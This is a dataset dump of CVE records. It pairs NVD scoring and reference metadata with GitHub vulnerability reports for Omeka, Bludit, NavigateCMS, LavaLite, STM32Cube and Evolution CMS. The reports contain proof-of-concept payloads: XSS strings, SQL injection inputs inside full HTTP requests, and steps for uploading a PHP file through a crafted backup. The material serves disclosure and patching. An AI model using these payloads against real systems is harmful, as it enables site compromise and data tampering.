{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "baseScore": 6.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 0.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/STMicroelectronics/STM32CubeH7/issues/81" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/STMicroelectronics/STM32CubeH7/issues/81" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:st:stm32cube_middleware:*:*:*:*:*:*:*:*", "matchCriteriaId": "11CDA8A4-121C-4623-ABA4-7546AB3F1406", "versionEndExcluding": null, "versionEndIncluding": "1.8.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:st:stm32h7b3:-:*:*:*:*:*:*:*", "matchCriteriaId": "95A1906D-8E90-492C-9A9A-E81DDD6AF587", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "120" ]
120
https://github.com/STMicroelectronics/STM32CubeH7/issues/81
[ "Exploit", "Third Party Advisory" ]
github.com
[ "STMicroelectronics", "STM32CubeH7" ]
**Describe the set-up** - Software: - STM32Cube MCU & MPU Packages - Version: - STM32Cube_FW_H7_V1.8.0 - Verification Hardware Platform: - STM32H7B3 **Describe the bug** - Function: - static void USBH_ParseEPDesc(USBH_EpDescTypeDef *ep_descriptor, uint8_t *buf) - Location: - https://github.com/STMicroelectronics/STM32CubeH7/blob/79196b09acfb720589f58e93ccf956401b18a191/Middlewares/ST/STM32_USB_Host_Library/Core/Src/usbh_ctlreq.c#L470 - Type: - Denial-of-Service. - Result: - The system will hang when try to communicate with the endpoint. - Description: - The function USBH_ParseEPDesc parses the endpoint descriptor of a USB device. - It doesn’t check if the variable ep_descriptor->wMaxPacketSize is greater than zero as shown in https://github.com/STMicroelectronics/STM32CubeH7/blob/79196b09acfb720589f58e93ccf956401b18a191/Middlewares/ST/STM32_USB_Host_Library/Core/Src/usbh_ctlreq.c#L470. If zero, the MSC handler will not able to communicate with the outside world as shown from line 180 to line 200 in https://github.com/STMicroelectronics/STM32CubeH7/blob/79196b09acfb720589f58e93ccf956401b18a191/Middlewares/ST/STM32_USB_Host_Library/Class/MSC/Src/usbh_msc.c **How To Reproduce** 1. Running MSC_Standalone application on the STM32H7B3I platform 2. Plug a USB disk 3. Use the attached Bug7.txt to replace the USB device packet. [Bug7.txt](https://github.com/STMicroelectronics/STM32CubeH7/files/5381343/Bug7.txt) **Additional context** - To patch it, the program should check if ep_descriptor->wMaxPacketSize is greater than zero.
No checking if ep_descriptor->wMaxPacketSize is greater than zero
https://api.github.com/repos/STMicroelectronics/STM32CubeH7/issues/81/comments
2
2020-10-14T22:57:52Z
2022-03-14T16:27:11Z
https://github.com/STMicroelectronics/STM32CubeH7/issues/81
721,848,148
81
2,235
CVE-2021-26799
2021-07-23T11:15:08.820
Cross Site Scripting (XSS) vulnerability in admin/files/edit in Omeka Classic <=2.7 allows remote attackers to inject arbitrary web script or HTML.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/omeka/Omeka/commit/08bfdf470e234edb68e5307a2fef8c899d89256c" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/omeka/Omeka/issues/935" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/omeka/Omeka/commit/08bfdf470e234edb68e5307a2fef8c899d89256c" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/omeka/Omeka/issues/935" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:omeka:omeka:*:*:*:*:*:*:*:*", "matchCriteriaId": "719CA2A5-8213-4BC5-9A3B-F4CFBFDB6C45", "versionEndExcluding": null, "versionEndIncluding": "2.7", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/omeka/Omeka/issues/935
[ "Exploit", "Third Party Advisory" ]
github.com
[ "omeka", "Omeka" ]
Hello Omeka Team! I was looking through your application (V2.7.1), and I discovered a stored XSS bug at "admin/files/edit". While most of the pages filter out tags that are not in the whitelist when "Use HTML" is on, "admin/files/edit" seems to allow them. My guess is that this is not the expected behavior? **POC:** 1. Create an item with a file attachment 2. Edit the file 3. Place `<img src=x onerror=alert(1)>` in one of the fields and toggle "Use HTML" to on. (An alert should pop up now, but ignore that and save changes) 4. Access the page containing the file, and an alert should pop up. 5. (Optional) Switch to a different account to verify that this affects all users. **Impact: client-side code execution** This bug shouldn't be very dangerous since it is only available to contributors, admins, and superusers. The session cookie is httponly, and the csrf tokens seem to be set properly (upon first glance). However, the XSS bug can be leveraged in many other ways, and it could increase the impact of a future vulnerability. Therefore, it's probably better to have it fixed. Please let me know if anything is unclear, or if this is not a legitimate issue. Thanks in advance!
Stored XSS in the admin/files/edit page
https://api.github.com/repos/omeka/Omeka/issues/935/comments
2
2021-02-03T18:18:22Z
2021-02-03T19:33:29Z
https://github.com/omeka/Omeka/issues/935
800,579,185
935
2,236
CVE-2021-25808
2021-07-23T20:15:08.080
A code injection vulnerability in backup/plugin.php of Bludit 3.13.1 allows attackers to execute arbitrary code via a crafted ZIP file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/bludit/bludit/issues/1298" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/bludit/bludit/issues/1298" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bludit:bludit:3.13.1:*:*:*:*:*:*:*", "matchCriteriaId": "2073F4B1-16F9-491D-A54E-5A1CBE9ED6F7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/bludit/bludit/issues/1298
[ "Exploit", "Third Party Advisory" ]
github.com
[ "bludit", "bludit" ]
Hi,I found a code execution vulnerability in Bludit v3.13.1 admin panel the path is bl-plugins/backup/plugin.php **1, Log in to the admin panel** ![图片](https://user-images.githubusercontent.com/21252367/103636497-064ebc00-4f85-11eb-960c-f4d098576648.png) **2, Click the backups button** ![图片](https://user-images.githubusercontent.com/21252367/103636585-2c745c00-4f85-11eb-96f4-d156c8d2047b.png) **3, Making evil backup zip** First download a backup ![图片](https://user-images.githubusercontent.com/21252367/103636622-37c78780-4f85-11eb-8d1a-e1ffb7ac3166.png) then use this zip to modify Place phpinfo.php file in path 2021-01-05-16-20-03\uploads\pages ![图片](https://user-images.githubusercontent.com/21252367/103636661-431ab300-4f85-11eb-9bff-360c02c499be.png) ![图片](https://user-images.githubusercontent.com/21252367/103636675-4746d080-4f85-11eb-8864-0df23fb850cc.png) Package 2021-01-05-16-20-03 as evil.zip ![图片](https://user-images.githubusercontent.com/21252367/103636688-4a41c100-4f85-11eb-8695-df77451456b8.png) Execute the script to generate the md5 for the .BLUDIT_BACKUP ![图片](https://user-images.githubusercontent.com/21252367/103636698-4ca41b00-4f85-11eb-96d5-739eeedb9ac2.png) **4, upload the evil backup zip** ![图片](https://user-images.githubusercontent.com/21252367/103636715-53329280-4f85-11eb-9a18-e4c6f90d7916.png) **5, Click the restore backup button** ![图片](https://user-images.githubusercontent.com/21252367/103636722-562d8300-4f85-11eb-9aa2-d88ea9bcca93.png) **6, Access the evil file bl-content/uploads/pages/phpinfo.php** ![图片](https://user-images.githubusercontent.com/21252367/103636727-59287380-4f85-11eb-8d1b-e8932cbe15c0.png)
Bludit v3.13.1 Code Execution Vulnerability in "Backups"
https://api.github.com/repos/bludit/bludit/issues/1298/comments
2
2021-01-05T10:41:41Z
2021-01-08T08:50:41Z
https://github.com/bludit/bludit/issues/1298
778,857,370
1,298
2,237
CVE-2021-37473
2021-07-26T18:15:08.620
In NavigateCMS version 2.9.4 and below, function in `product.php` is vulnerable to sql injection on parameter `products-order` through a post request, which results in arbitrary sql query execution in the backend database.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://gist.github.com/victomteng1997/ed429fed7de46651c89f05e7591fd4fe" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/NavigateCMS/Navigate-CMS" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/NavigateCMS/Navigate-CMS/issues/26" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://gist.github.com/victomteng1997/ed429fed7de46651c89f05e7591fd4fe" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://github.com/NavigateCMS/Navigate-CMS" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/NavigateCMS/Navigate-CMS/issues/26" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:naviwebs:navigatecms:*:*:*:*:*:*:*:*", "matchCriteriaId": "7E0B50CA-FE10-4301-9AE3-73DE37402B18", "versionEndExcluding": null, "versionEndIncluding": "2.9.4", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/NavigateCMS/Navigate-CMS/issues/26
[ "Exploit", "Third Party Advisory" ]
github.com
[ "NavigateCMS", "Navigate-CMS" ]
Hi, I would like to report 6 SQL Injection vulnerabilities identified in the latest version of the CMS. ## Vulnerability 1: `block_order` injection at `blocks.php` vulnerable code: `blocks.php` <pre><code> function run() { global $layout; global $DB; global $website; $out = ''; $item = new block(); switch($_REQUEST['act']) { case 'load': case 'edit': case 2: if(!empty($_REQUEST['id'])) { $item->load(intval($_REQUEST['id'])); } if(isset($_REQUEST['form-sent'])) { $item->load_from_post(); try { naviforms::check_csrf_token(); $item->save(); property::save_properties_from_post('block', $item->id); $id = $item->id; // set block order if(!empty($item->type) && !empty($_REQUEST['blocks-order'])) { <strong> block::reorder($item->type, $_REQUEST['blocks-order'], $_REQUEST['blocks-order-fixed']); //step into </strong> } </code></pre> which triggers `block.class.php` ```php public static function reorder($type, $order, $fixed) { global $DB; global $website; $item = explode("#", $order);//explore order by '#' for($i=0; $i < count($item); $i++) { if(empty($item[$i])) { continue; } $block_is_fixed = ($fixed[$item[$i]]=='1'? '1' : '0'); $ok = $DB->execute(' UPDATE nv_blocks SET position = '.($i+1).', fixed = '.$block_is_fixed.' WHERE id = '.$item[$i].'// trigger here AND website = '.$website->id ``` Attacker can inject in `block-order` through http request. A sample request traffic: ``` POST /navigate/navigate.php?fid=blocks&act=edit&id=7&tab=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------195682555912966620871610644291 Content-Length: 7310 Origin: http://localhost Connection: close Referer: http://localhost/navigate/navigate.php?fid=blocks&act=edit&id&tab=1 Cookie: language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=vp8rDkw03etQUgHzT9FpieSJ5umQS6ZuLBUE2HnrfYgc4eiNLHWQdPZYVJM6; guest_token=IkpPRWlGeWdObThKVGdTQTdqTFZSdWcxNjA4MjgxNzg4ODE2Ig%3D%3D--acb8c6e71d42560c0d4ce4741531f317312a4f8a; navigate-tinymce-scroll=%7B%7D; navigate-remember-user-id=af59694d7163bd32096f6752379642aee3043fc5; navigate-remember-user-token=9%01%B3%0C%C6%BB%0C%0Bb%D9%18%CB%A1n%CB9a%CF%3E%0Fx%D0Q%EFX%C7C%11%DB%D7S%06B%1B%40+%11L%EB%2A%ABr%E1%EE%D2m%DA%B8%B233%0A%05%A8t%C7%3D%9E%FA%B4%03%C13g1%AF%E1%B4%A6%5C%87%3A%08J%A5%D3%C6%BFVZ%18%A0t%D2%E8GG%8B%AD%BE%BC%25yg%EDh%FB%AFtD%16%81%9D%93y%AD%C5%3AuL%FB%E4%88%B6%B4%F78%E8%D2OIA%11%EE%F1%17cj; navigate-language=en; PHPSESSID=17v9et2fl867j0od9hlvj990ab; NVSID_7a6b5d33_421aa90e079fa326b6494f812ad13e79=17v9et2fl867j0od9hlvj990ab Upgrade-Insecure-Requests: 1 -----------------------------195682555912966620871610644291 Content-Disposition: form-data; name="form-sent" true -----------------------------195682555912966620871610644291 Content-Disposition: form-data; name="id" 7 -----------------------------195682555912966620871610644291 Content-Disposition: form-data; name="_nv_csrf_token" ...... Content-Disposition: form-data; name="blocks-order" **5 or 1=1** ``` This can be reflected in the backend database result. Didn't further justify the sql injection outcomes but clearly attacker can do arbitrary sql query. ![1_block_sql_injection_sql_result](https://user-images.githubusercontent.com/81791091/126586568-2565e1cc-2318-403f-98a5-1deb98531a4d.png) ## Vulnerability 2: `id` at `items.php` Vulnerable code `item.php`: <pre><code> //package/lib/packages/items/items.php function run() { global $layout; global $DB; global $website; global $theme; global $user; $out = ''; $item = new item(); switch($_REQUEST['act']) { case "change_comment_status": // change comment status if(empty($_REQUEST['id'])) { echo "false"; core_terminate(); } switch($_REQUEST['opt']) { case 'publish': $DB->execute(' UPDATE nv_comments SET status = 0 WHERE website = '.$website->id.' AND <strong>id = '.$_REQUEST['id']);</strong> break; case 'unpublish': $DB->execute(' UPDATE nv_comments SET status = 1 WHERE website = '.$website->id.' AND <strong>id = '.$_REQUEST['id']);</strong> break; case 'delete': $DB->execute(' DELETE FROM nv_comments WHERE website = '.$website->id.' AND <strong>id = '.$_REQUEST['id']);</strong> break; } </pre></code> Attacker can use a traffic similar to: ``` GET /navigate/navigate.php?fid=items&act=change_comment_status&**id=abc%20or%201=1**&opt=publish HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=vp8rDkw03etQUgHzT9FpieSJ5umQS6ZuLBUE2HnrfYgc4eiNLHWQdPZYVJM6; guest_token=IkpPRWlGeWdObThKVGdTQTdqTFZSdWcxNjA4MjgxNzg4ODE2Ig%3D%3D--acb8c6e71d42560c0d4ce4741531f317312a4f8a; navigate-tinymce-scroll=%7B%7D; navigate-remember-user-id=af59694d7163bd32096f6752379642aee3043fc5; navigate-remember-user-token=9%01%B3%0C%C6%BB%0C%0Bb%D9%18%CB%A1n%CB9a%CF%3E%0Fx%D0Q%EFX%C7C%11%DB%D7S%06B%1B%40+%11L%EB%2A%ABr%E1%EE%D2m%DA%B8%B233%0A%05%A8t%C7%3D%9E%FA%B4%03%C13g1%AF%E1%B4%A6%5C%87%3A%08J%A5%D3%C6%BFVZ%18%A0t%D2%E8GG%8B%AD%BE%BC%25yg%EDh%FB%AFtD%16%81%9D%93y%AD%C5%3AuL%FB%E4%88%B6%B4%F78%E8%D2OIA%11%EE%F1%17cj; navigate-language=en; PHPSESSID=17v9et2fl867j0od9hlvj990ab; NVSID_7a6b5d33_421aa90e079fa326b6494f812ad13e79=17v9et2fl867j0od9hlvj990ab Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 ``` ## Vulnerability 3: `products_order` at `products.php` Vulnerable code <pre><code> //package/lib/packages/products/products.php function run() { global $layout; global $DB; global $website; global $theme; global $user; $out = ''; $item = new product(); switch($_REQUEST['act']) { **case 'products_order':** if(!empty($_POST['products-order'])) { if(naviforms::check_csrf_token('header')) { // save new order <strong>$response = product::reorder($_POST['products-order']);</strong> if($response!==true) { echo $response['error']; } else { echo 'true'; } } } </pre></code> Then it triggers ```php //package/lib/packages/products/product.class.php public static function reorder($order) { global $DB; global $website; **$items = explode("#", $order);** for($i=0; $i < count($items); $i++) { if(empty($items[$i])) { continue; } $ok = $DB->execute(' UPDATE nv_products SET position = '.($i+1).' **WHERE id = '.$items[$i].' AND** website = '.$website->id ); ``` ## Vulnerability 4: `id` in `products.php` Vulnerable code: <pre><code> //package/lib/packages/products/products.php case "change_comment_status": if(empty($_REQUEST['id'])) { echo "false"; core_terminate(); } switch($_REQUEST['opt']) { case 'publish': $DB->execute(' UPDATE nv_comments SET status = 0 <strong>WHERE website = '.$website->id.' AND id = '.$_REQUEST['id']);</strong> break; case 'unpublish': $DB->execute(' UPDATE nv_comments SET status = 1 <strong>WHERE website = '.$website->id.' AND id = '.$_REQUEST['id']);</strong> break; case 'delete': $DB->execute(' DELETE FROM nv_comments <strong>WHERE website = '.$website->id.' AND id = '.$_REQUEST['id']);</strong> break; } </pre></code> Attacker can easily craft something like this to trigger the vulnerability ``` http://localhost/navigate/navigate.php?fid=products&act=change_comment_status&id=1%20or%201=1;&opt=publish ``` ## Vulnerability 5: `property::reorder` at `templates.php` vulnerable code: <pre><code> //package/lib/packages/templates/templates.php case 'load': case 2: // edit/new form if(!empty($_REQUEST['id'])) { if(is_numeric($_REQUEST['id'])) { $item->load(intval($_REQUEST['id'])); } else { $item->load_from_theme($_REQUEST['id']); } } if(isset($_REQUEST['form-sent'])) { try { $item->load_from_post(); naviforms::check_csrf_token(); $item->save(); if(!empty($_REQUEST['property-enabled'])) { $enableds = array_values($_REQUEST['property-enabled']); } else { $enableds = array(); } <strong>property::reorder("template", $item->id, $_REQUEST['template-properties-order'], $enableds);</strong> </pre></code> Then step into ``` //package/lib/packages/properties/property.class.php public static function reorder($element, $template, $order, $enableds=NULL) { global $DB; global $website; **$item = explode("#", $order);** for($i=0; $i < count($item); $i++) { if(empty($item[$i])) continue; $enabled = ''; if(is_array($enableds)) { $enabled = ', enabled = 0 '; for($e=0; $e < count($enableds); $e++) { if($enableds[$e]==$item[$i]) $enabled = ', enabled = 1 '; } } $ok = $DB->execute(' UPDATE nv_properties SET position = '.($i+1).' '.$enabled.' **WHERE id = '.$item[$i].'** AND website = '.$website->id ); ``` ## Vulnerability 6: `children_order` at `structure.php` Vulnerable code: ```php //package/lib/packages/structure/structure.php case "reorder": **$ok = structure::reorder($_REQUEST['parent'], $_REQUEST['children_order']);** echo json_encode($ok); core_terminate(); break; ``` Then steps into ```php //package/lib/packages/structure/structure.class.php public static function reorder($parent, $children) { global $DB; global $website; **$children = explode("#", $children);** for($i=0; $i < count($children); $i++) { if(empty($children[$i])) { continue; } $ok = $DB->execute('UPDATE nv_structure SET position = '.($i+1).' **WHERE id = '.$children[$i].'** AND parent = '.intval($parent).' AND website = '.$website->id); if(!$ok) { return array("error" => $DB->get_last_error()); } } return true; } ``` Attacker can easily craft a traffic as below to cause the injection: `http://localhost/navigate/navigate.php?fid=structure&act=reorder&parent=1&children=abc%20or%201=1`
Multiple SQL Injection Vulnerabilities Identified in the latest version (v2.9.4 r1561)
https://api.github.com/repos/NavigateCMS/Navigate-CMS/issues/26/comments
1
2021-07-22T04:24:26Z
2021-07-24T06:37:20Z
https://github.com/NavigateCMS/Navigate-CMS/issues/26
950,289,292
26
2,238
CVE-2020-23234
2021-07-26T20:15:08.323
Cross Site Scripting (XSS) vulnerabiity exists in LavaLite CMS 5.8.0 via the Menu Blocks feature, which can be bypassed by using HTML event handlers, such as "ontoggle,".
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LavaLite/cms/issues/320" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LavaLite/cms/issues/320" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:lavalite:lavalite:5.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "B3D6757B-5BF4-402B-9A71-D79B460EC3C1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/LavaLite/cms/issues/320
[ "Exploit", "Third Party Advisory" ]
github.com
[ "LavaLite", "cms" ]
Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Menu Blocks" feature. This was can be bypassed by using HTML event handlers, such as "ontoggle". To Reproduce Steps to reproduce the behavior: 1. Log into the /admin 2. Go to "/admin/block/block" 3. Click "Categories" 4. Select a function then press New 5. Insert payload to Name: '><details/open/ontoggle=confirm(1337)> ![image](https://user-images.githubusercontent.com/50371661/82517428-4b81c300-9b47-11ea-8e6d-2cd7f16ca426.png) 6. Click "Save" 7. View the preview to trigger XSS. 8. View the preview to get in request and such Stored XSS ![image](https://user-images.githubusercontent.com/50371661/82517446-56d4ee80-9b47-11ea-9a48-78223372596b.png) Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site.
Cross Site Scripting Vulnerability on "Blocks Links" feature in LavaLite 5.8.0
https://api.github.com/repos/LavaLite/cms/issues/320/comments
0
2020-05-21T02:42:23Z
2020-05-21T02:42:23Z
https://github.com/LavaLite/cms/issues/320
622,205,824
320
2,239
CVE-2020-23238
2021-07-26T20:15:08.353
Cross Site Scripting (XSS) vulnerability in Evolution CMS 2.0.2 via the Document Manager feature.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/evolution-cms/evolution/issues/1473" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/evolution-cms/evolution/issues/1473" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:evo:evolution_cms:2.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "C327BB7C-09EF-45BD-B0D3-D2266647A597", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/evolution-cms/evolution/issues/1473
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "evolution-cms", "evolution" ]
